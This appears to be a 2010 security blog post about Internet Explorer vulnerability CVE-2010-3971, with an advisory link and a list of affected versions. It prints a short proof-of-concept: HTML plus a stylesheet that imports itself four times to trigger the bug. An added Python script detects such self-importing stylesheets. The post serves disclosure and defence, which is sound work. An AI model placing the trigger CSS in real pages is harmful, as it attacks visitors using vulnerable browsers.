
[MS] Vulnerability in Internet Explorer Could Allow Remote Code Execution(CVE-2010-3971)

by 잡다한 처리 2010. 12. 23.



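A new vulnerability has been found in Microsoft's Internet Explorer.

The vulnerability appears to be triggered when the CSS is called four or more times.

IE6, IE7 and IE8 are all vulnerable, so for the time being it is safer to stay away from sites that get compromised often(?), and to
hold off on risky browsing ^^

See the links below for details ^^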


- PoC code (because of this code, the blog may be flagged as malicious by Google or IE8 ^^)
<code>
<div style="position: absolute; top: -999px;left: -999px;">
<link href="css.css" rel="stylesheet" type="text/css" />
</code>
 
<code of css.css>
*{
 color:red;
}
@import url("css.css");
@import url("css.css");
@import url("css.css");
@import url("css.css");
</code>
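
On the detection side, the pattern in the PoC above is a stylesheet whose `@import` rules resolve back to its own URL. The following is an added example, not code from the original post or from WooYun; the function names, the `example.test` URLs and the default threshold of 1 are assumptions.

```python
import re
from urllib.parse import urljoin, urlsplit

# Matches @import url("x"), @import url(x), @import "x" and @import 'x'.
IMPORT_RE = re.compile(
    r"""@import\s*(?:url\(\s*)?["']?([^"')\s;]+)""", re.IGNORECASE
)
COMMENT_RE = re.compile(r"/\*.*?\*/", re.DOTALL)

# Constructed sample input: the css.css body from the PoC, at an assumed URL.
POC_URL = "http://example.test/poc/css.css"
POC_CSS = """*{
 color:red;
}
@import url("css.css");
@import url("css.css");
@import url("css.css");
@import url("css.css");
"""

# Constructed benign sheet: imports another file; self-reference only in a comment.
BENIGN_URL = "http://example.test/site.css"
BENIGN_CSS = '@import url("base.css");\n/* @import "site.css"; */\nbody { margin: 0; }\n'


def _key(url):
    """Compare URLs by scheme, host and path; query and fragment are ignored."""
    parts = urlsplit(url)
    return (parts.scheme.lower(), parts.netloc.lower(), parts.path)


def self_imports(css_text, sheet_url):
    """Return the @import targets in css_text that resolve back to sheet_url."""
    body = COMMENT_RE.sub("", css_text)  # skip commented-out rules
    own = _key(sheet_url)
    return [t for t in IMPORT_RE.findall(body)
            if _key(urljoin(sheet_url, t)) == own]


def is_suspicious(css_text, sheet_url, threshold=1):
    """Flag a sheet with at least `threshold` self-referencing @import rules.

    Assumption: threshold defaults to 1, since a sheet importing itself is
    never useful; raise it to 4 to match only the count seen in the PoC.
    """
    return len(self_imports(css_text, sheet_url)) >= threshold


if __name__ == "__main__":
    for url, css in ((POC_URL, POC_CSS), (BENIGN_URL, BENIGN_CSS)):
        print(url, self_imports(css, url), is_suspicious(css, url))
```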
 
http://www.wooyun.org/bugs/wooyun-2010-0885
 
WooYun is a connection platform for vendors and security researchers
 
EDB:
Dec 22, 2010 - Microsoft releases security advisory for this vulnerability:
http://www.microsoft.com/technet/security/advisory/2488013.mspx


<Affected software>
- Internet Explorer 6  
Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 with SP2 for Itanium-based Systems

- Internet Explorer 7  
Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 with SP2 for Itanium-based Systems
Windows Vista Service Pack 1 and Windows Vista Service Pack 2
Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2
Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2

- Internet Explorer 8  
Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2
Windows Vista Service Pack 1 and Windows Vista Service Pack 2
Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2
Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2
Windows 7 for 32-bit Systems
Windows 7 for x64-based Systems
Windows Server 2008 R2 for x64-based Systems
Windows Server 2008 R2 for Itanium-based Systems

